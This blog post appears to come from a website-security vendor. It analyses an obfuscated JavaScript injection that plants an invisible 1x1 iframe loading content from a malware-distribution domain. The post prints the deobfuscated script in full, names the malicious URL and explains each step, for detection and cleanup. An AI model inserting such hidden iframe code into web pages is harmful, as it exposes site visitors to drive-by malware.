Obfuscated malicious JavaScript code creates iframe and injects into the website page
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.
This post describes the detected JavaScript as is and then shows how the malicious actions is created during the page rendering. You can try and locate such code on your website and do analysis and removal if required. This article should not be used as hacking guide.
This post describes the detected JavaScript as is and then shows how the malicious actions is created during the page rendering. You can try and locate such code on your website and do analysis and removal if required. This article should not be used as hacking guide.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Malware entry
Malware entry details.
Beautified script
When scanning the website with Quttera Website Malware Scanner you can see the Threat Dump field populated with the detected JavaScript code. De-obfuscation of one of such threat dump looks like this:
- wa = 't';
- p = 'ht';
- f = 'k98';
- tb = 'ame';
- bg = '.';
- v = 'sr';
- g = 'tp:';
- vf = '/z';
- bs = 't';
- px = 'v.h';
- br = 'yt';
- k = 'c';
- yr = 'm';
- ds = 'm';
- ej = '/';
- au = '/';
- t = 'com';
- sp = 'ifr';
- r = 'ca';
- cp = 'y';
- wz = 'ir';
- wf = 'u';
- b = '5';
- se = sp.concat(tb);
- oz = v.concat(k);
- /*
- * set db to point to http: //zirycatum.com/k985ytv.htm
- */
- db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
- var ip = document.createElement(se);
- ip.setAttribute('width', '1');
- ip.setAttribute('height', '1');
- ip.frameBorder = 0;
- ip.setAttribute(oz, db);
- document.body.appendChild(ip);
It did not take much effort to understand the result of code execution because except for few JavaScript methods the rest are simple value assignment to a variable.
Let's take a look at the interesting stuff:
- se = sp.concat(tb);
- oz = v.concat(k);
- db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
Again, just combining all the strings inside the variables in the parenthesis with the string inside p to get
db = http: //zirycatum.com/k985ytv.htm
- var ip = document.createElement(se);
As we saw earlier, se = 'iframe' hence ip =document.createElement('iframe'); This is pretty self-explanatory.
Now let's make our iframe invisible or at least too small to be visually detected. This is done by the following lines:
- ip.setAttribute('width', '1');
- ip.setAttribute('height', '1');
- ip.frameBorder = 0;
- ip.setAttribute(oz, db);
Which is document.createElement('iframe').setAttribute('src', 'http: //zirycatum.com/k985ytv.htm'). Now we all set to inject our just created iframe into the rendered document:
- document.body.appendChild(ip);
Blacklisting status
Now let's see whether the redirection is really malicious? Let's check the domain in the Quttera scanner again.Quttera website malware scanner |
Although, Quttera detects only single Potentially Suspicious file and no active malware at the time this article is being written, both Google and MalwareDomainList has already added this domain to their blacklists.
The website is Suspicious on Google Safe Browsing for hosting malware. As well it is listed in MalwareDomainList for redirecting to fake AV,
The website is Suspicious on Google Safe Browsing for hosting malware. As well it is listed in MalwareDomainList for redirecting to fake AV,
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment